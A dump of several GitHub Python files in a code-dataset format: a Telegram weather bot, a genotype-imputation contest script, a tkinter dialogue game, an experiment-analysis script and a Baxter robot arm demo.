self.msg)\r\n self.dispatcher.add_handler(message)\r\n \r\n weather = CommandHandler('weather', self.show_weather)\r\n self.dispatcher.add_handler(weather)\r\n \r\n suggest = CommandHandler('suggest_clothes', self.suggest)\r\n self.dispatcher.add_handler(suggest)\r\n \r\n unknown = MessageHandler(Filters.command, self.unknown)\r\n self.dispatcher.add_handler(unknown)\r\n \r\n def start(self, update, context):\r\n context.bot.send_message(chat_id = update.effective_chat.id, text='Hi! I am feelslikebot! I am here to inform you about weather!')\r\n \r\n def get_temp(self, temp):\r\n temp = float(temp)\r\n if temp > 5.0 and temp < 15.0:\r\n return 'cool'\r\n elif temp < 5.0:\r\n return 'cold'\r\n elif temp > 15.0 and temp < 25.0:\r\n return 'warm'\r\n else:\r\n return 'heat'\r\n \r\n \r\n def suggest(self, context, update, weather, temp):\r\n weather = weather.lower()\r\n temp_range = self.get_temp(temp)\r\n with open('dump_json_clothes.txt', 'r') as dump:\r\n suggestions = json.load(dump)\r\n if weather in suggestions:\r\n random_number = random.randint(0, len(suggestions[weather][temp_range]['top'])-1)\r\n top = f\"This would be perfect for top: {suggestions[weather][temp_range]['top'][random_number]}\\n\"\r\n down = f\"And this for down: {suggestions[weather][temp_range]['down'][random_number]}\"\r\n context.bot.send_message(chat_id = update.effective_chat.id, text= top + down )\r\n else:\r\n sorry = 'Sorry, didn`t find something suitable for you!'\r\n context.bot.send_message(chat_id = update.effective_chat.id, text= sorry )\r\n \r\n def show_weather(self, update, context):\r\n data = self.weather_api.data_for(*context.args)\r\n weather = data['weather'][0]['main']\r\n temp = data['main']['temp']\r\n weather_data = f\"I guess it is:\\n{data['weather'][0]['description'].capitalize()}\\n\"\r\n temp_data = f\"And temperature is {data['main']['temp']} C. Feels like {data['main']['feels_like']} C.\\n\"\r\n wind = f\"Wind is about {data['wind']['speed']} m/s.\"\r\n context.bot.send_message(chat_id = update.effective_chat.id, text= weather_data + temp_data + wind)\r\n self.suggest(context,update, weather, temp)\r\n \r\n def msg(self, update, context):\r\n with open('dictionary.txt') as di:\r\n data = json.load(di)\r\n if update.message.text.lower() in data:\r\n text = data[update.message.text.lower()]\r\n else: \r\n text = 'I didn`t get it!'\r\n context.bot.send_message(chat_id = update.effective_chat.id, text=text)\r\n \r\n def unknown(self, update, context):\r\n context.bot.send_message(chat_id = update.effective_chat.id, text='I dont speak that language')\r\n \r\n \r\n def work(self):\r\n self.updater.start_polling() #начать запрашивать обновления из телеграма\r\n print('Bot is ready for work!')\r\n self.updater.idle()\r\n \r\nBot = Bot('####################################')\r\nBot.work()\r\n","repo_name":"aleksejepishev/Moscow-Coding-School","sub_path":"feelslike.py","file_name":"feelslike.py","file_ext":"py","file_size_in_byte":4537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74140028840","text":"\nimport warnings\nwarnings.simplefilter(action='ignore', category=FutureWarning)\n\nimport os\nimport numpy as np\nimport json\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.ensemble import GradientBoostingClassifier\n\nPROBLEM_DIR = os.path.dirname(os.path.dirname(os.path.realpath(__file__)))\nDATA_DIR = f'{PROBLEM_DIR}/data'\nRESULTS_DIR = f'{PROBLEM_DIR}/results'\n\ndef loadProblems(fn):\n ret = {}\n fp = open(fn, 'r')\n \n num_known, num_partial = [int(x) for x in fp.readline().rstrip().split(' ')]\n \n observed_dips = []\n for x in range(0, num_known):\n fp.readline()\n new_hap = fp.readline().rstrip()\n new_hap2 = fp.readline().rstrip()\n #I don't think this matters\n #assert(new_hap not in known_haps)\n #assert(new_hap2 not in known_haps)\n c1 = np.array([int(c) for c in new_hap], dtype=' 0 or ind+delta < hap_len):\n if ind - delta > 0 and known_indices[ind-delta]:\n found.append(ind-delta)\n if ind+delta < hap_len and known_indices[ind+delta]:\n found.append(ind+delta)\n delta += 1\n \n lookups = np.array(found)\n \n #print(f'found for {ind}:', lookups)\n\n #fit a model\n xs = [od[lookups] for od in observed_dips]\n ys = [od[ind] for od in observed_dips]\n #forest = RandomForestClassifier(random_state=0)\n y_sum = np.sum(ys)\n if y_sum == 0 or y_sum == 2*len(ys):\n predictions = [ys[0]]*len(unknown_ints)\n else:\n forest = GradientBoostingClassifier(\n random_state=0, max_depth=6, n_estimators=40, subsample=0.5\n )\n forest.fit(xs, ys)\n\n #now do some predictions\n xp = [ui[lookups] for ui in unknown_ints]\n predictions = forest.predict(xp)\n\n for x in range(0, num_unknown):\n results[x] += str(predictions[x])\n\n '''\n #now do the final imputations\n imputed = []\n for j, c in enumerate(uh):\n if c == '?':\n h1 = int(hap_arr[best_x][j])\n h2 = int(hap_arr[best_y][j])\n imputed.append(str(h1+h2))\n else:\n imputed.append(c)\n results.append(''.join(imputed))\n '''\n\n return results\n \ndef writeResults(fn, all_results):\n fp = open(fn, 'w+')\n for result in all_results:\n fp.write(result+'\\n')\n fp.close()\n\nif __name__ == '__main__':\n #there are usually multiple per problem\n starting_problem = 3\n ending_problem = 3\n\n if not os.path.exists(RESULTS_DIR):\n os.makedirs(RESULTS_DIR)\n\n #go through each ones\n for problem in range(starting_problem, ending_problem+1):\n #filenames below might need to change per problem\n print(f'Analyzing problem set #{problem}...')\n fn = f'{DATA_DIR}/test{problem}.txt'\n fno = f'{RESULTS_DIR}/{problem}.txt'\n\n #load the problems for this set\n problems = loadProblems(fn)\n\n #generate results for each one\n print(f'\\tSolving problem {problem}...')\n all_results = solveProblem(problems)\n \n #finally save the results\n writeResults(fno, all_results)\n","repo_name":"holtjma/bio_contest_2021","sub_path":"problem_3.2/scripts/main_v2.py","file_name":"main_v2.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"18"} +{"seq_id":"3493029831","text":"# -*- coding: utf-8 -*-\r\n\r\n\r\nfrom PIL import Image, ImageDraw, ImageTk\r\nimport tkinter as tk \r\nimport numpy as np\r\n\r\n\r\nplayer_name = 'Master'\r\n\r\nimages = [] # for storing all objects created with method create_polygon\r\n\r\n\r\nclass Scene:\r\n \r\n def __init__(self,img_name, name, content1, content2):\r\n \r\n self.img_name = img_name \r\n self.name = name \r\n self.content1 = content1 \r\n self.content2 = content2 \r\n\r\n\r\n def display_scene(self):\r\n '''\r\n For normal story scenes \r\n '''\r\n self.root = tk.Tk()\r\n self.canvas = tk.Canvas(self.root, width=700, height=400)\r\n self.canvas.pack()\r\n \r\n self.image = Image.open(self.img_name,'r')\r\n self.image.thumbnail((704.2,390), Image.ANTIALIAS)\r\n self.image = self.image.convert('RGBA')\r\n \r\n tk_img = ImageTk.PhotoImage(self.image)\r\n \r\n self.canvas.create_image(0,0, image=tk_img, anchor=tk.NW)\r\n\r\n # dialogue box\r\n points_dialogue = ((117, 310), (570, 310), (570, 380), (117, 380))\r\n self.create_polygon(*points_dialogue, fill='blue', alpha=0.5, line_fill='white', line_width=30, line_alpha=0.7)\r\n self.add_text((145, 327), self.content1, fill='white', font=('Verdana', 10))\r\n self.add_text((145, 352), self.content2, fill='white', font=('Verdana', 10))\r\n \r\n # name box \r\n points_name = ((140,288), (152+(len(self.name)*7),288) , (152+(len(self.name)*7), 313), (140,313))\r\n self.create_polygon(*points_name, fill='white', alpha=0.85, line_fill='white', line_width=3, line_alpha=0.8)\r\n self.add_text((148, 292), self.name, fill='blue', font=('Helvetica', 10, 'bold'))\r\n\r\n # next button \r\n nxt_button_img = self.image.crop((self.image.size[0]-100,0,self.image.size[0],self.image.size[1]))\r\n nxt_button_image = ImageTk.PhotoImage(nxt_button_img)\r\n nxt_button = tk.Button(self.root, image=nxt_button_image, bd=0, command=self.close_win)\r\n self.canvas.create_window(self.image.size[0]-100,0, anchor=tk.NW, window=nxt_button) \r\n self.root.mainloop()\r\n\r\n\r\n def select_option(self, op1, op2):\r\n '''\r\n For story scenes with options popping up \r\n '''\r\n self.root = tk.Tk()\r\n self.canvas = tk.Canvas(self.root, width=700, height=400)\r\n self.canvas.pack()\r\n \r\n self.image = Image.open(self.img_name,'r')\r\n self.image.thumbnail((704.2,390), Image.ANTIALIAS)\r\n self.image = self.image.convert('RGBA')\r\n \r\n tk_img = ImageTk.PhotoImage(self.image)\r\n \r\n self.canvas.create_image(0,0, image=tk_img, anchor=tk.NW)\r\n\r\n # dialogue box\r\n points_dialogue = ((117, 310), (570, 310), (570, 380), (117, 380))\r\n self.create_polygon(*points_dialogue, fill='blue', alpha=0.5, line_fill='white', line_width=20, line_alpha=0.7)\r\n self.add_text((145, 327), self.content1, fill='white', font=('Verdana', 10))\r\n self.add_text((145, 352), self.content2, fill='white', font=('Verdana', 10))\r\n \r\n # name box \r\n points_name = ((140,288), (152+(len(self.name)*7),288) , (152+(len(self.name)*7), 313), (140,313))\r\n self.create_polygon(*points_name, fill='white', alpha=0.85, line_fill='white', line_width=3, line_alpha=0.8)\r\n self.add_text((148, 292), self.name, fill='royalblue', font=('Helvetica', 10, 'bold'))\r\n\r\n self.ans = 'A' # set default self.ans as A when no option is clicked\r\n \r\n # option box 1\r\n points_op1 = ((170,165), (180,150), (500,150), (510,165), (500,180), (180,180))\r\n self.create_polygon(*points_op1, fill='royalblue', alpha=0.8, line_fill='navy', line_width=25, line_alpha=0.7)\r\n self.add_text((205, 158), '>>> A: '+op1, fill='darkblue', font=('Verdana', 9, 'bold'))\r\n\r\n # option box 1 button - call optionA_callback\r\n button_img = ImageTk.PhotoImage(file='button_img.jpg')\r\n buttonA = tk.Button(self.root, image=button_img, bd=0, command=lambda: self.optionA_callback(op1, op2), height=10, width=35)\r\n self.canvas.create_window(201, 160, anchor=tk.NW, window=buttonA) \r\n\r\n # option box 2\r\n points_op2 = ((170,225), (180,210), (500,210), (510,225), (500,240), (180,240))\r\n self.create_polygon(*points_op2, fill='royalblue', alpha=0.8, line_fill='navy', line_width=25, line_alpha=0.7)\r\n self.add_text((205, 218), '>>> B: '+op2, fill='darkblue', font=('Verdana', 9, 'bold'))\r\n \r\n # option box 2 button - call optionB_callback\r\n buttonB = tk.Button(self.root, image=button_img, bd=0, command=lambda: self.optionB_callback(op1, op2), height=10, width=35)\r\n self.canvas.create_window(201, 220, anchor=tk.NW, window=buttonB) \r\n\r\n # next button \r\n nxt_button_img = self.image.crop((self.image.size[0]-100,0,self.image.size[0],self.image.size[1]))\r\n nxt_button_image = ImageTk.PhotoImage(nxt_button_img)\r\n nxt_button = tk.Button(self.root, image=nxt_button_image, bd=0, command=self.close_win)\r\n self.canvas.create_window(self.image.size[0]-98,0, anchor=tk.NW, window=nxt_button) \r\n \r\n self.root.mainloop()\r\n\r\n # self.ans returned from optionA/B_callback function \r\n if self.ans == 'A':\r\n print(player_name+': \"'+op1+'\"')\r\n elif self.ans == 'B':\r\n print(player_name+': \"'+op2+'\"')\r\n \r\n return self.ans\r\n\r\n \r\n def optionA_callback(self, op1, op2):\r\n '''\r\n Called when option A is clicked\r\n '''\r\n # buttonA change to red \r\n points_op1 = ((170,165), (180,150), (500,150), (510,165), (500,180), (180,180))\r\n self.create_polygon(*points_op1, fill='royalblue', alpha=0.8, line_fill='red', line_width=30, line_alpha=0.7) \r\n self.add_text((205, 158), '>>> A: '+op1, fill='red', font=('Verdana', 9, 'bold'))\r\n \r\n # buttonB change to blue\r\n points_op2 = ((170,225), (180,210), (500,210), (510,225), (500,240), (180,240))\r\n self.create_polygon(*points_op2, fill='royalblue', alpha=0.8, line_fill='navy', line_width=25, line_alpha=0.7)\r\n self.add_text((205, 218), '>>> B: '+op2, fill='darkblue', font=('Verdana', 9, 'bold')) \r\n \r\n self.ans = 'A'\r\n \r\n return self.ans\r\n \r\n \r\n def optionB_callback(self, op1, op2):\r\n '''\r\n Called when option B is clicked\r\n '''\r\n # buttonB change to red \r\n points_op2 = ((170,225), (180,210), (500,210), (510,225), (500,240), (180,240))\r\n self.create_polygon(*points_op2, fill='royalblue', alpha=0.8, line_fill='red', line_width=30, line_alpha=0.7)\r\n self.add_text((205, 218), '>>> B: '+op2, fill='red', font=('Verdana', 9, 'bold')) \r\n \r\n # buttonA change to blue \r\n points_op1 = ((170,165), (180,150), (500,150), (510,165), (500,180), (180,180))\r\n self.create_polygon(*points_op1, fill='royalblue', alpha=0.8, line_fill='navy', line_width=25, line_alpha=0.7)\r\n self.add_text((205, 158), '>>> A: '+op1, fill='darkblue', font=('Verdana', 9, 'bold')) \r\n \r\n self.ans = 'B'\r\n \r\n return self.ans\r\n\r\n\r\n def create_polygon(self,*points, **kwargs):\r\n '''\r\n Creates polygon object (& outline) with variable transparency\r\n Function Inputs: *points_poly, fill, alpha, line_fill, line_width, line_alpha\r\n '''\r\n # extract coordinates from point arguments\r\n x_list = [coord[0] for coord in points]\r\n y_list = [coord[1] for coord in points]\r\n \r\n alpha = kwargs.pop('alpha') # extract alpha input \r\n opacity = int(255*alpha)\r\n fill = kwargs.pop('fill') # extract colour input for polygon\r\n fill_opacity = self.root.winfo_rgb(fill) + (opacity,)\r\n \r\n line_width = kwargs.pop('line_width')\r\n line_alpha = kwargs.pop('line_alpha') # extract alpha input \r\n line_opacity = int(255*line_alpha) \r\n line_fill = kwargs.pop('line_fill') \r\n line_fill_opacity = self.root.winfo_rgb(line_fill) + (line_opacity,)\r\n \r\n # crop out a section of the bg image JUST around the polygon (+/-cut)\r\n min_x = min(x_list)\r\n max_x = max(x_list)\r\n min_y = min(y_list)\r\n max_y = max(y_list)\r\n cut = 6\r\n cropped_image = self.image.crop((min_x-cut,min_y-cut,max_x+cut,max_y+cut))\r\n \r\n # create an overlay image (cropped background) around the polygon \r\n overlay = Image.new('RGBA', cropped_image.size , (255,255,255)+(0,))\r\n draw = ImageDraw.Draw(overlay) \r\n \r\n # convert to coord of polygon relative to the cropped overlay image\r\n polygon_coord = [(i-(min_x-cut),j-(min_y-cut)) for (i,j) in zip(x_list,y_list)]\r\n\r\n # Create an enlarged polygon centered at polygon midpoint to form the outline\r\n midpt = ((max_x-min_x+2*cut)/2., (max_y-min_y+2*cut)/2.)\r\n vector_to_mid = np.subtract(np.array(polygon_coord),np.array(midpt)) # vector dir to enlarge\r\n unit_vector = vector_to_mid / (vector_to_mid**2).sum()**0.5\r\n enlarged_coord = polygon_coord + unit_vector * line_width \r\n enlarged_coord = [(i,j) for i,j in enlarged_coord] # convect array back to ((x1,y1),(x2,y2),...) format\r\n \r\n # draw polygon to form outline with alpha transparency\r\n draw.polygon(enlarged_coord, fill=line_fill_opacity)\r\n \r\n # draw polygon on overlay with alpha transparency \r\n draw.polygon(polygon_coord, fill=fill_opacity)\r\n \r\n # combine the objects with overlay \r\n img = Image.alpha_composite(cropped_image, overlay) \r\n img = img.convert('CMYK')\r\n \r\n images.append(ImageTk.PhotoImage(img))\r\n \r\n # paste overlay back to background image on same location where it was taken out\r\n self.canvas.create_image(min_x-cut,min_y-cut, image=images[-1], anchor='nw') \r\n \r\n \r\n def add_text(self, position, text, **kwargs):\r\n '''\r\n Puts text onto canvas\r\n '''\r\n fill = kwargs.pop('fill')\r\n font = kwargs.pop('font')\r\n self.canvas.create_text(*position, anchor=tk.NW, fill=fill, font=font, text=text)\r\n \r\n \r\n def close_win(self):\r\n '''\r\n Called from next button - Close current tkinter window to run the next scene\r\n '''\r\n self.root.destroy()\r\n\r\n\r\n## Set up content in each scene \r\n\r\ndef scene_1(): # story\r\n \r\n img_name = 'okita_happy.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"I was looking for you, \"+player_name+\"!\"\r\n content2 = \"You look happy today wwwwwwwwww\"\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene1 = Scene(img_name, name, content1, content2)\r\n scene1.display_scene()\r\n\r\ndef scene_2(): # option \r\n \r\n img_name = 'okita_blush.jpg'\r\n name = 'Okita Souji'\r\n content1 = 'Heyhey, '+player_name+', do I.... look any different today?'\r\n content2 = ''\r\n op1 = 'Did you buy a new sword again?'\r\n op2 = 'Ermmm, still fat.'\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene2 = Scene(img_name, name, content1, content2)\r\n scene2.display_scene()\r\n ans2 = scene2.select_option(op1, op2)\r\n return ans2\r\n \r\ndef scene_3(): # story\r\n \r\n img_name = 'okita_sad.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"Is that it....? I thought you would realise the new kimono.\"\r\n content2 = \"(sigh)\"\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene3 = Scene(img_name, name, content1, content2)\r\n scene3.display_scene()\r\n \r\ndef scene_4(): # option\r\n \r\n img_name = 'okita_yell.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"Shut upppp! \"+player_name+\" I hate you.\"\r\n content2 = ''\r\n op1 = '??????'\r\n op2 = 'Okay, my bad!'\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene4 = Scene(img_name, name, content1, content2)\r\n scene4.display_scene()\r\n ans4 = scene4.select_option(op1, op2)\r\n return ans4\r\n\r\ndef scene_5(): # story\r\n \r\n img_name = 'okita_yell.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"Baka! Baka baka baka!\"\r\n content2 = player_name+\" You're a big baka!\"\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene5 = Scene(img_name, name, content1, content2)\r\n scene5.display_scene()\r\n \r\ndef scene_6(): # story\r\n \r\n img_name = 'okita_sad.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"Stop bullying me, don't do that to your own waifu.\"\r\n content2 = \" \"\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene6 = Scene(img_name, name, content1, content2)\r\n scene6.display_scene()\r\n\r\ndef scene_7(): # story\r\n \r\n img_name = 'okita_happy.jpg'\r\n name = 'Okita Souji'\r\n content1 = \"The shinsengumi went out yesterday, Hijikata-san bought me \"\r\n content2 = \"a kimono as present!\"\r\n print(name+': \"'+content1+' '+content2+'\"')\r\n scene7 = Scene(img_name, name, content1, content2)\r\n scene7.display_scene()\r\n \r\n \r\ndef main():\r\n '''\r\n Story flow; options tree\r\n '''\r\n scene_1()\r\n ans2 = scene_2() \r\n if ans2 == 'A':\r\n scene_3() \r\n scene_7()\r\n elif ans2 == 'B':\r\n ans4 = scene_4() \r\n if ans4 == 'A':\r\n scene_5()\r\n elif ans4 == 'B':\r\n scene_6()\r\n \r\n return \r\n\r\n \r\nif __name__ == '__main__':\r\n main()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Cheryl-Lau/Dialogue_game","sub_path":"galgame code test10.py","file_name":"galgame code test10.py","file_ext":"py","file_size_in_byte":13564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27589848154","text":"import pickle\nfrom sklearn.ensemble import ExtraTreesClassifier, RandomForestClassifier\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nfrom sklearn.model_selection import cross_val_score\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_recall\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import time_score2\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_avg_runtime\nfrom fastsklearnfeature.interactiveAutoML.new_bench.multiobjective.metalearning.analyse.time_measure import get_optimum_avg_runtime\n\nfrom sklearn.metrics import make_scorer\nfrom sklearn.dummy import DummyClassifier\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn import tree\nfrom sklearn.tree import export_graphviz\nfrom subprocess import call\nfrom sklearn.model_selection import LeaveOneGroupOut\nfrom sklearn.model_selection import GroupKFold\nfrom sklearn.model_selection import RandomizedSearchCV\nimport copy\nimport glob\n\n\nmappnames = {1:'TPE(Variance)',\n\t\t\t 2: 'TPE($\\chi^2$)',\n\t\t\t 3:'TPE(FCBF)',\n\t\t\t 4: 'TPE(Fisher)',\n\t\t\t 5: 'TPE(MIM)',\n\t\t\t 6: 'TPE(MCFS)',\n\t\t\t 7: 'TPE(ReliefF)',\n\t\t\t 8: 'TPE(NR)',\n 9: 'SA(NR)',\n\t\t\t 10: 'NSGA-II(NR)',\n\t\t\t 11: 'ES(NR)',\n\t\t\t 12: 'SFS(NR)',\n\t\t\t 13: 'SBS(NR)',\n\t\t\t 14: 'SFFS(NR)',\n\t\t\t 15: 'SBFS(NR)',\n\t\t\t 16: 'RFE(LR)',\n\t\t\t 17: 'Complete Set'\n\t\t\t }\n\nnames = ['accuracy',\n\t 'fairness',\n\t 'k_rel',\n\t 'k',\n\t 'robustness',\n\t 'privacy',\n\t 'search_time',\n\t 'cv_acc - acc',\n\t 'cv_fair - fair',\n\t 'cv_k - k rel',\n\t 'cv_k - k',\n\t 'cv_robust - robust',\n 'cv time',\n\t 'rows',\n\t 'columns']\n\ndef print_constraints_2(features):\n\n\n\tmy_str = ''\n\tfor i in range(len(names)):\n\t\tmy_str += names[i] + ': ' + str(features[i]) + ' '\n\tprint(my_str)\n\n\n\n\nexperiment_folders = glob.glob(\"/home/felix/phd/versions_dfs/new_experiments/*/\")\n\nprint(experiment_folders)\n\n\ndataset = {}\ndataset['best_strategy'] = []\ndataset['validation_satisfied'] = []\n\n\ndataset['success_value'] = []\ndataset['success_value_validation'] = []\ndataset['times_value'] = []\ndataset['max_search_time'] = []\ndataset['dataset_id'] = []\n\ndataset['distance_to_test_constraint'] = []\n\n\ndef load_pickle(fname):\n\tdata = []\n\twith open(fname, \"rb\") as f:\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tdata.append(pickle.load(f))\n\t\t\texcept EOFError:\n\t\t\t\tbreak\n\treturn data\n\n\ndef is_successfull_validation_and_test(exp_results):\n\treturn len(exp_results) > 0 and 'success_test' in exp_results[-1] and exp_results[-1]['success_test'] == True #also on test satisfied\n\ndef is_successfull_validation(exp_results):\n\treturn len(exp_results) > 0 and 'Validation_Satisfied' in exp_results[-1] # constraints were satisfied on validation set\n\n\n\ndef distance_to_constraints_on_test(exp_results, best_run, info_dict):\n\tmin_fairness = info_dict['constraint_set_list']['fairness']\n\tmin_accuracy = info_dict['constraint_set_list']['accuracy']\n\tmin_robustness = info_dict['constraint_set_list']['robustness']\n\tmax_number_features = info_dict['constraint_set_list']['k']\n\n\tif type(best_run) != type(None):\n\t\ttest_fair = exp_results[best_run]['test_fair']\n\t\ttest_acc = exp_results[best_run]['test_acc']\n\t\ttest_robust = exp_results[best_run]['test_robust']\n\t\ttest_number_features = exp_results[best_run]['cv_number_features']\n\telse:\n\t\ttest_fair = 0.0\n\t\ttest_acc = 0.0\n\t\ttest_robust = 0.0\n\t\ttest_number_features = 1.0\n\n\n\n\tloss = 0.0\n\tif min_fairness > 0.0 and test_fair < min_fairness:\n\t\tloss += (min_fairness - test_fair) ** 2\n\tif min_accuracy > 0.0 and test_acc < min_accuracy:\n\t\tloss += (min_accuracy - test_acc) ** 2\n\tif min_robustness > 0.0 and test_robust < min_robustness:\n\t\tloss += (min_robustness - test_robust) ** 2\n\tif max_number_features < 1.0 and test_number_features > max_number_features:\n\t\tloss += (test_number_features - max_number_features) ** 2\n\n\treturn loss\n\ndef distance_to_constraints_on_validation(exp_results, best_run, info_dict):\n\tmin_fairness = info_dict['constraint_set_list']['fairness']\n\tmin_accuracy = info_dict['constraint_set_list']['accuracy']\n\tmin_robustness = info_dict['constraint_set_list']['robustness']\n\tmax_number_features = info_dict['constraint_set_list']['k']\n\n\tif type(best_run) != type(None):\n\t\ttest_fair = exp_results[best_run]['cv_fair']\n\t\ttest_acc = exp_results[best_run]['cv_acc']\n\t\ttest_robust = exp_results[best_run]['cv_robust']\n\t\ttest_number_features = exp_results[best_run]['cv_number_features']\n\telse:\n\t\ttest_fair = 0.0\n\t\ttest_acc = 0.0\n\t\ttest_robust = 0.0\n\t\ttest_number_features = 1.0\n\n\n\n\tloss = 0.0\n\tif min_fairness > 0.0 and test_fair < min_fairness:\n\t\tloss += (min_fairness - test_fair) ** 2\n\tif min_accuracy > 0.0 and test_acc < min_accuracy:\n\t\tloss += (min_accuracy - test_acc) ** 2\n\tif min_robustness > 0.0 and test_robust < min_robustness:\n\t\tloss += (min_robustness - test_robust) ** 2\n\tif max_number_features < 1.0 and test_number_features > max_number_features:\n\t\tloss += (test_number_features - max_number_features) ** 2\n\n\treturn loss\n\n\nstrategy_distance_test = {}\nstrategy_distance_validation = {}\nfor s in range(1, len(mappnames) + 1):\n\tstrategy_distance_test[s] = []\n\tstrategy_distance_validation[s] = []\n\n\nnumber_ml_scenarios = 1200\nrun_count = 0\nfor efolder in experiment_folders:\n\trun_folders = sorted(glob.glob(efolder + \"*/\"))\n\tfor rfolder in run_folders:\n\t\ttry:\n\t\t\tinfo_dict = pickle.load(open(rfolder + 'run_info.pickle', \"rb\"))\n\t\t\trun_strategies_success_test = {}\n\t\t\trun_strategies_times = {}\n\t\t\trun_strategies_success_validation = {}\n\n\t\t\tvalidation_satisfied_by_any_strategy = False\n\n\t\t\tmin_time = np.inf\n\t\t\tbest_strategy = 0\n\t\t\tfor s in range(1, len(mappnames) + 1):\n\t\t\t\texp_results = []\n\t\t\t\ttry:\n\t\t\t\t\texp_results = load_pickle(rfolder + 'strategy' + str(s) + '.pickle')\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t\tif is_successfull_validation_and_test(exp_results):\n\t\t\t\t\truntime = exp_results[-1]['final_time']\n\t\t\t\t\tif runtime < min_time:\n\t\t\t\t\t\tmin_time = runtime\n\t\t\t\t\t\tbest_strategy = s\n\n\t\t\t\t\trun_strategies_success_test[s] = True\n\t\t\t\t\trun_strategies_times[s] = runtime\n\t\t\t\telse:\n\t\t\t\t\trun_strategies_success_test[s] = False\n\t\t\t\t\t#run_strategies_times[s] = runtime\n\n\t\t\t\trun_strategies_success_validation[s] = is_successfull_validation(exp_results)\n\t\t\t\tif run_strategies_success_validation[s]:\n\t\t\t\t\tvalidation_satisfied_by_any_strategy = True\n\n\t\t\tdataset['success_value'].append(run_strategies_success_test)\n\t\t\tdataset['success_value_validation'].append(run_strategies_success_validation)\n\t\t\tdataset['best_strategy'].append(best_strategy)\n\t\t\tdataset['times_value'].append(run_strategies_times)\n\t\t\tdataset['validation_satisfied'].append(validation_satisfied_by_any_strategy)\n\n\t\t\tdataset['max_search_time'].append(info_dict['constraint_set_list']['search_time'])\n\t\t\tdataset['dataset_id'].append(info_dict['dataset_id'])\n\n\t\t\trun_count += 1\n\t\texcept FileNotFoundError:\n\t\t\tpass\n\n\t\tif run_count == number_ml_scenarios:\n\t\t\tbreak\n\tif run_count == number_ml_scenarios:\n\t\tbreak\n\nmap_dataset2name = {}\nmap_dataset2name['31'] = 'German Credit'\nmap_dataset2name['802'] = 'Primary Biliary Cirrhosis'\nmap_dataset2name['1590'] = 'Adult'\nmap_dataset2name['1461'] = 'Bank Marketing'\nmap_dataset2name['42193'] = 'COMPAS'\nmap_dataset2name['1480'] = 'Indian Liver Patient'\n#map_dataset2name['804'] = 'hutsof99_logis'\nmap_dataset2name['42178'] = 'Telco Customer Churn'\nmap_dataset2name['981'] = 'KDD Internet Usage'\nmap_dataset2name['40536'] = 'Speed Dating'\nmap_dataset2name['40945'] = 'Titanic'\nmap_dataset2name['451'] = 'Irish Educational Transitions'\n#map_dataset2name['945'] = 'Kidney'\nmap_dataset2name['446'] = 'Leptograpsus crabs'\nmap_dataset2name['1017'] = 'Arrhythmia'\nmap_dataset2name['957'] = 'Brazil Tourism'\nmap_dataset2name['41430'] = 'Diabetic Mellitus'\nmap_dataset2name['1240'] = 'AirlinesCodrnaAdult'\nmap_dataset2name['1018'] = 'IPUMS Census'\n#map_dataset2name['55'] = 'Hepatitis'\nmap_dataset2name['38'] = 'Thyroid Disease'\nmap_dataset2name['1003'] = 'Primary Tumor'\nmap_dataset2name['934'] ='Social Mobility'\n\n\ndatasets_ids = np.unique(dataset['dataset_id'])\n\nfor d in range(len(datasets_ids)):\n\tprint(map_dataset2name[datasets_ids[d]] + ' ' + str(np.sum(np.array(dataset['dataset_id']) == datasets_ids[d])))","repo_name":"BigDaMa/DFS","sub_path":"new_project/fastsklearnfeature/interactiveAutoML/new_bench/multiobjective/metalearning/analyse/for_validation/get_runs_per_data.py","file_name":"get_runs_per_data.py","file_ext":"py","file_size_in_byte":8273,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"18"} +{"seq_id":"37527181599","text":"import time\nimport rospy\nimport _thread\nimport threading\nimport baxter #here we are importing the baxter.py interface. (cause it's in this same folder, but in your project please clone the repo as submodule and import the interface as described in the readme)\n\nrospy.init_node(\"testing\")\nrobotL = baxter.BaxterRobot(rate=100, arm=\"left\")\nrobotR = baxter.BaxterRobot(rate=100, arm=\"right\")\nrospy.sleep(2.0)\n\nrobotL.set_robot_state(True)\n\n#sequential movements\n#print(robotL.move_to_neutral())\n#print(robotR.move_to_neutral())\n\n# parallel movements of both arms\nclass myThread (threading.Thread):\n def __init__(self, threadID, name, robot):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.robot = robot\n def run(self):\n print (\"Starting \" + self.name)\n print(self.robot.move_to_neutral())\n print (\"Exiting \" + self.name)\n\n\nthread1 = myThread(1, \"Thread-1\", robotL)\nthread2 = myThread(2, \"Thread-2\", robotR)\nthread1.start()\nthread2.start()\nthread1.join()\nthread2.join()\nprint (\"Exiting Main Thread\")\nrobotL.set_robot_state(False)\n","repo_name":"igor-lirussi/baxter-python3","sub_path":"robotStateFalse.py","file_name":"robotStateFalse.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} 